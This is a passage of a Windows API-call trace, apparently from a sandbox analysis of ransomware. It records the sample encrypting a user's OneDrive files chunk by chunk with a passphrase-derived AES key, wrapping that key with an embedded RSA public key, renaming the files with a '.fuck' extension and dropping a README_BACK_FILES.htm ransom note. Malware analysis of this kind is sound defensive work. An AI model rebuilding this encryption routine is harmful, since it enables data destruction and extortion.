lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.755] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.755] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.755] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.756] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.756] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.756] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.756] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0281.756] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0281.756] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0281.756] CloseHandle (hObject=0x5d4c) returned 1 [0281.756] CloseHandle (hObject=0x5d80) returned 1 [0281.757] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.763] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.763] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.765] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.767] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.767] CryptDestroyKey (hKey=0x2fc248) returned 1 [0281.767] CryptReleaseContext (hProv=0x2f1eb30, dwFlags=0x0) returned 1 [0281.767] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.767] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.767] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\readme_back_files.htm")) returned 0xffffffff [0281.767] AreFileApisANSI () returned 1 [0281.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0281.768] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nb-no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nb-no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.769] GetFileType (hFile=0x5d3c) returned 0x1 [0281.769] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.770] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.770] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.770] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.770] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.771] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.771] GetLastError () returned 0x0 [0281.771] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.772] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.773] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ne-np\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.774] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ne-np\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.775] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ef70) returned 1 [0281.777] CryptCreateHash (in: hProv=0x2f1ef70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.777] lstrlenA (lpString="IobgRfrtGtwdLWqndRsiYwqNzMlQm") returned 29 [0281.777] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.777] CryptDeriveKey (in: hProv=0x2f1ef70, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc248) returned 1 [0281.777] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.777] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.777] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1f218) returned 1 [0281.778] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1f218, dwCertEncodingType=0x1, pInfo=0x2f36fc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36ff0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36ff8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc408) returned 1 [0281.778] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.778] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e5e0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e5e0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.778] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1e5e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e5e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.779] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.792] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.792] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.794] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.794] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.803] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.803] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.803] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.803] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.804] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.804] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.805] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.805] CryptEncrypt (in: hKey=0x2fc248, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.806] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.806] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, 